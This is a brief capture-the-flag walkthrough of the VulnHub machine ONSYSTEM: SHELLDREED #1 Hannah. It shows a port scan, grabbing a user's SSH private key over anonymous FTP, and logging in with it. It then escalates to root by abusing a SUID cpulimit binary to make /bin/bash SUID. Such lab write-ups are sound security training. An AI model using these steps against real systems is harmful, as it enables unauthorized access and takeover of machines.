ONSYSTEM: SHELLDREED #1 HANNAH vulnhub writeup

I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.

nmap -p- -A <IP>

Let’s login with Ftp as Anonymous :

Move to cd .hannah maybe Hannah is a user and get id_rsa. Now try to connect with ssh as hannah

chmod 600 id_rsa
ssh -i id_rsa hannah@<IP> -p 61000

Works

Now it’s time to privilege escalation, use the following command to search for SUID files :

find / -type f -perm /6000 -ls 2>/dev/null

Found an interesting one

Use this site to find some exploit for cpulimit. Try to understand how it works before running the exploit.

cpulimit -l 100 -f whoami

With this command we can be root :

cpulimit -l 100 -f chmod +s /bin/bash

/bin/bash -p

Root !

Cat the flag :

…well done